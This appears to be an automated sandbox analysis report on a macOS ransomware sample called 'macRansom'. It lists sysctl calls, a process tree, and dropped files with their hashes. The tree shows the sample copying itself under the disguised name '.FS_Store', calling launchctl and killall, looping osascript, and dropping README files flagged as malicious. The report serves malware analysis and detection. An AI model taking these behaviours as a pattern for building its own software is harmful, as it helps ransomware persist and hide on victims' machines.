Source: /bin/sh (PID: 813)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 814)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 816)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 817)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 819)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 820)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 822)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 823)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 825)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 826)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 828)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 829)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 831)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 832)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 834)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 835)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 837)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 838)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 840)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 841)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 843)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 844)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 846)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 847)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 849)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 850)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 852)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 853)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 855)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 856)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 858)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 859)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 861)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 862)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 864)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 865)Sysctl requested: kern.hostname (1.10)


Runtime Messages

Command:/Users/vreni/Desktop/macRansom
Exitcode:55
Killed:False
Standard Output:Done
Standard Error:

Yara Overview

No Yara matches

Screenshot

cam-macmac-stand

Startup

  • system is mac1
  • mono-sgen32 (PID: 686 PPID: 641 MD5: 8910349f44a940d8d79318367855b236)
  • macRansom (PID: 686 PPID: 641 Overlayed Process Image: mono-sgen32 MD5: 8fe94843a3e655209c57af587849ac3a)
    • sh (PID: 687 PPID: 686 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 688 PPID: 687 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sysctl (PID: 688 PPID: 687 Overlayed Process Image: sh MD5: 6b5514b612e9e7ea63857c6fdcab2c5b)
      • sh (PID: 689 PPID: 687 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • grep (PID: 689 PPID: 687 Overlayed Process Image: sh MD5: f7fe9c4af9294f2949377a12244b3d60)
    • sh (PID: 690 PPID: 686 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 691 PPID: 690 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 692 PPID: 691 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • sh (PID: 694 PPID: 692 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • sysctl (PID: 694 PPID: 692 Overlayed Process Image: sh MD5: 6b5514b612e9e7ea63857c6fdcab2c5b)
        • sh (PID: 695 PPID: 691 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • sh (PID: 696 PPID: 695 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • sysctl (PID: 696 PPID: 695 Overlayed Process Image: sh MD5: 6b5514b612e9e7ea63857c6fdcab2c5b)
      • sh (PID: 693 PPID: 690 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • grep (PID: 693 PPID: 690 Overlayed Process Image: sh MD5: f7fe9c4af9294f2949377a12244b3d60)
    • sh (PID: 697 PPID: 686 MD5: 2cc3c26641112c1bd0173f396b7d7662)
    • mv (PID: 697 PPID: 686 Overlayed Process Image: sh MD5: 7fb694b9a3c7fd27aa7fca81d5afdfeb)
    • sh (PID: 698 PPID: 686 MD5: 2cc3c26641112c1bd0173f396b7d7662)
    • touch (PID: 698 PPID: 686 Overlayed Process Image: sh MD5: 6e95af6ebd7fd2dd9a0e26654024db31)
    • sh (PID: 699 PPID: 686 MD5: 2cc3c26641112c1bd0173f396b7d7662)
    • touch (PID: 699 PPID: 686 Overlayed Process Image: sh MD5: 6e95af6ebd7fd2dd9a0e26654024db31)
    • sh (PID: 700 PPID: 686 MD5: 2cc3c26641112c1bd0173f396b7d7662)
    • launchctl (PID: 700 PPID: 686 Overlayed Process Image: sh MD5: 5c763753d802b9b6b8225d829e7a7fc9)
    • sh (PID: 701 PPID: 686 MD5: 2cc3c26641112c1bd0173f396b7d7662)
    • launchctl (PID: 701 PPID: 686 Overlayed Process Image: sh MD5: 5c763753d802b9b6b8225d829e7a7fc9)
  • xpcproxy (PID: 702 PPID: 1 MD5: b2faf9621ba8f5b2bcea6ee7d572a8b7)
  • bash (PID: 702 PPID: 1 Overlayed Process Image: xpcproxy MD5: )
  • bash (PID: 702 PPID: 1 Overlayed Process Image: bash MD5: 5d7583d80e5314ac844eedc6d68c6cd7)
    • bash (PID: 703 PPID: 702 MD5: 5d7583d80e5314ac844eedc6d68c6cd7)
    • pgrep (PID: 703 PPID: 702 Overlayed Process Image: bash MD5: 1d6274484312b8d37153962fa6ba6c19)
    • bash (PID: 704 PPID: 702 MD5: 5d7583d80e5314ac844eedc6d68c6cd7)
    • .FS_Store (PID: 704 PPID: 702 Overlayed Process Image: bash MD5: 8fe94843a3e655209c57af587849ac3a)
      • sh (PID: 705 PPID: 704 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 706 PPID: 705 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sysctl (PID: 706 PPID: 705 Overlayed Process Image: sh MD5: 6b5514b612e9e7ea63857c6fdcab2c5b)
        • sh (PID: 707 PPID: 705 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • grep (PID: 707 PPID: 705 Overlayed Process Image: sh MD5: f7fe9c4af9294f2949377a12244b3d60)
      • sh (PID: 708 PPID: 704 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 709 PPID: 708 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • sh (PID: 710 PPID: 709 MD5: 2cc3c26641112c1bd0173f396b7d7662)
            • sh (PID: 712 PPID: 710 MD5: 2cc3c26641112c1bd0173f396b7d7662)
            • sysctl (PID: 712 PPID: 710 Overlayed Process Image: sh MD5: 6b5514b612e9e7ea63857c6fdcab2c5b)
          • sh (PID: 713 PPID: 709 MD5: 2cc3c26641112c1bd0173f396b7d7662)
            • sh (PID: 714 PPID: 713 MD5: 2cc3c26641112c1bd0173f396b7d7662)
            • sysctl (PID: 714 PPID: 713 Overlayed Process Image: sh MD5: 6b5514b612e9e7ea63857c6fdcab2c5b)
        • sh (PID: 711 PPID: 708 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • grep (PID: 711 PPID: 708 Overlayed Process Image: sh MD5: f7fe9c4af9294f2949377a12244b3d60)
      • sh (PID: 715 PPID: 704 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • find (PID: 715 PPID: 704 Overlayed Process Image: sh MD5: 64fb7128066436f7954ecd6eaf22b2ad)
        • sh (PID: 716 PPID: 715 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • sh (PID: 717 PPID: 716 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • whoami (PID: 717 PPID: 716 Overlayed Process Image: sh MD5: 430282bb4bfe4a1368a9effa4fe6733f)
        • find (PID: 718 PPID: 715 MD5: 64fb7128066436f7954ecd6eaf22b2ad)
        • .FS_Store (PID: 718 PPID: 715 Overlayed Process Image: find MD5: 8fe94843a3e655209c57af587849ac3a)
          • sh (PID: 719 PPID: 718 MD5: 2cc3c26641112c1bd0173f396b7d7662)
            • sh (PID: 720 PPID: 719 MD5: 2cc3c26641112c1bd0173f396b7d7662)
            • sysctl (PID: 720 PPID: 719 Overlayed Process Image: sh MD5: 6b5514b612e9e7ea63857c6fdcab2c5b)
            • sh (PID: 721 PPID: 719 MD5: 2cc3c26641112c1bd0173f396b7d7662)
            • grep (PID: 721 PPID: 719 Overlayed Process Image: sh MD5: f7fe9c4af9294f2949377a12244b3d60)
          • sh (PID: 722 PPID: 718 MD5: 2cc3c26641112c1bd0173f396b7d7662)
            • sh (PID: 723 PPID: 722 MD5: 2cc3c26641112c1bd0173f396b7d7662)
              • sh (PID: 724 PPID: 723 MD5: 2cc3c26641112c1bd0173f396b7d7662)
                • sh (PID: 726 PPID: 724 MD5: 2cc3c26641112c1bd0173f396b7d7662)
                • sysctl (PID: 726 PPID: 724 Overlayed Process Image: sh MD5: 6b5514b612e9e7ea63857c6fdcab2c5b)
              • sh (PID: 727 PPID: 723 MD5: 2cc3c26641112c1bd0173f396b7d7662)
                • sh (PID: 728 PPID: 727 MD5: 2cc3c26641112c1bd0173f396b7d7662)
                • sysctl (PID: 728 PPID: 727 Overlayed Process Image: sh MD5: 6b5514b612e9e7ea63857c6fdcab2c5b)
            • sh (PID: 725 PPID: 722 MD5: 2cc3c26641112c1bd0173f396b7d7662)
            • grep (PID: 725 PPID: 722 Overlayed Process Image: sh MD5: f7fe9c4af9294f2949377a12244b3d60)
      • sh (PID: 730 PPID: 704 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • touch (PID: 730 PPID: 704 Overlayed Process Image: sh MD5: 6e95af6ebd7fd2dd9a0e26654024db31)
      • sh (PID: 731 PPID: 704 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • touch (PID: 731 PPID: 704 Overlayed Process Image: sh MD5: 6e95af6ebd7fd2dd9a0e26654024db31)
      • sh (PID: 732 PPID: 704 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • killall (PID: 732 PPID: 704 Overlayed Process Image: sh MD5: e27cce82be3cba31a2486d00964d1c5e)
      • .FS_Store (PID: 734 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 735 PPID: 734 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 736 PPID: 734 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 736 PPID: 734 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 738 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 739 PPID: 738 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 740 PPID: 738 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 740 PPID: 738 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 741 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 742 PPID: 741 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 743 PPID: 741 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 743 PPID: 741 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 745 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 746 PPID: 745 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 747 PPID: 745 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 747 PPID: 745 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 748 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 749 PPID: 748 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 750 PPID: 748 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 750 PPID: 748 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 751 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 752 PPID: 751 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 753 PPID: 751 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 753 PPID: 751 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 754 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 755 PPID: 754 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 756 PPID: 754 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 756 PPID: 754 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 757 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 758 PPID: 757 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 759 PPID: 757 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 759 PPID: 757 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 760 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 761 PPID: 760 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 762 PPID: 760 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 762 PPID: 760 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 763 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 764 PPID: 763 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 765 PPID: 763 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 765 PPID: 763 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 766 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 767 PPID: 766 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 768 PPID: 766 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 768 PPID: 766 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 769 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 770 PPID: 769 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 771 PPID: 769 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 771 PPID: 769 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 772 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 773 PPID: 772 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 774 PPID: 772 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 774 PPID: 772 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 775 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 776 PPID: 775 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 777 PPID: 775 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 777 PPID: 775 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 778 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 779 PPID: 778 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 780 PPID: 778 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 780 PPID: 778 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 782 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 783 PPID: 782 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 784 PPID: 782 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 784 PPID: 782 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 785 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 786 PPID: 785 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 787 PPID: 785 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 787 PPID: 785 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 788 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 789 PPID: 788 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 790 PPID: 788 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 790 PPID: 788 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 791 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 792 PPID: 791 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 793 PPID: 791 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 793 PPID: 791 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 794 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 795 PPID: 794 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 796 PPID: 794 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 796 PPID: 794 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 797 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 798 PPID: 797 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 799 PPID: 797 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 799 PPID: 797 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 800 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 801 PPID: 800 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 802 PPID: 800 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 802 PPID: 800 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 803 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 804 PPID: 803 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 805 PPID: 803 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 805 PPID: 803 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 806 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 807 PPID: 806 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 808 PPID: 806 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 808 PPID: 806 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 809 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 810 PPID: 809 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 811 PPID: 809 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 811 PPID: 809 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 812 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 813 PPID: 812 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 814 PPID: 812 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 814 PPID: 812 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 815 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 816 PPID: 815 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 817 PPID: 815 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 817 PPID: 815 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 818 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 819 PPID: 818 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 820 PPID: 818 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 820 PPID: 818 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 821 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 822 PPID: 821 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 823 PPID: 821 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 823 PPID: 821 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 824 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 825 PPID: 824 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 826 PPID: 824 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 826 PPID: 824 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 827 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 828 PPID: 827 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 829 PPID: 827 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 829 PPID: 827 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 830 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 831 PPID: 830 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 832 PPID: 830 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 832 PPID: 830 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 833 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 834 PPID: 833 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 835 PPID: 833 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 835 PPID: 833 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 836 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 837 PPID: 836 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 838 PPID: 836 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 838 PPID: 836 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 839 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 840 PPID: 839 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 841 PPID: 839 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 841 PPID: 839 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 842 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 843 PPID: 842 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 844 PPID: 842 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 844 PPID: 842 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 845 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 846 PPID: 845 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 847 PPID: 845 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 847 PPID: 845 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 848 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 849 PPID: 848 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 850 PPID: 848 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 850 PPID: 848 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 851 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 852 PPID: 851 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 853 PPID: 851 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 853 PPID: 851 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 854 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 855 PPID: 854 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 856 PPID: 854 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 856 PPID: 854 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 857 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 858 PPID: 857 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 859 PPID: 857 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 859 PPID: 857 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 860 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 861 PPID: 860 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 862 PPID: 860 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 862 PPID: 860 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 863 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
        • sh (PID: 864 PPID: 863 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 865 PPID: 863 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • osascript (PID: 865 PPID: 863 Overlayed Process Image: sh MD5: 204848f1335ae82d1dad8403c341056d)
      • .FS_Store (PID: 866 PPID: 704 MD5: 8fe94843a3e655209c57af587849ac3a)
  • cleanup

Created / dropped Files

File PathType and HashesMalicious
/dev/null
  • Type: ASCII text
  • MD5: 671AABF6067DCB12E27FF0366DAB3230
  • SHA: D62C4B01511DD846D5D2C9CCCBDCB3080CAA2CE6
  • SHA-256: 83B91B9FF5E916BF66F1EBAB76C42B05CF95C8612FB93A9E709058A5290BC1A9
  • SHA-512: 507A035A8178D607CFACB3300D2667872FE8524795B31F7688834E2830812A53EF9681EC99112B5215512933AF7316EB639DA985AB7F20A15629D27506C0778B
false
/private/var/root/.forward
  • Type: ISO-8859 text, with no line terminators
  • MD5: A0EFEFF7648B1301C80275435922705D
  • SHA: 77F9FC2BEE122F141D0DAA25D763BD87D8CC5DF7
  • SHA-256: 8B2FE116CD080777596B866845EC55481D9D9DB2E8862287568766B787537CC7
  • SHA-512: 4D835CB17C011F91406A94B47A76BEC64CE9C9FA5CB328F66D4A389A6E21319E1BB68CC3D8383B7617BE55DC652101F24316D095ADC05FA70E69CECC3FD8954C
false
/private/var/root/.oracle_jre_usage/613bcfb3a06ef613.timestamp
  • Type: data
  • MD5: 4272BAD0DD6B37966FD345459010AE4D
  • SHA: 0E43DD54D4DA0B5D7443F41F6D5EDF1BEBC760ED
  • SHA-256: 4A616DF6BFEEB8F7B10E199FEB8D43C02CA493F2BF47FAD83213DAB554513F42
  • SHA-512: F5ECDD33913195BE7D0C5210DEA7D6630DF6D9FFBF197D66E982A578C78F66A315AF797C83C845EC6C87D636C6F548E90FE3055CD3B6800D8068BBD04FBBDCAE
false
/private/var/root/Desktop/._README_
  • Type: data
  • MD5: AFB0937560B6289F6ECE0AB706AD7A2E
  • SHA: 9D922785927E2B01978887C58EEAE0A6A179D305
  • SHA-256: F9B057E63688E6D91CFD8D32902E6D7B164FE11778A0CFD49C145212E1A879CF
  • SHA-512: 691E233B302249FEB7D001464F61C9B483A4B45634735CACB22FB9B2FAFBDF6D0A58E9BCACF5ADA46C0ECB57046FE3B5F286F958CDE60232E4E83A971AAD993A
true
/private/var/root/Desktop/__README__0
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
